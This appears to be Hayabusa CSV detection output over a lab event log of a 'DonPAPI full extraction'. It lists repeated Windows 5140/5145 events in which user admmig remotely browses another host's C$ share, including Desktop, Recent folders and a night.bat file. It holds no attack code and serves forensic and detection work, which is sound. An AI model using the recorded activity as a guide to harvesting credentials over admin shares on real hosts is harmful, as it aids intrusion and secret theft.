+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
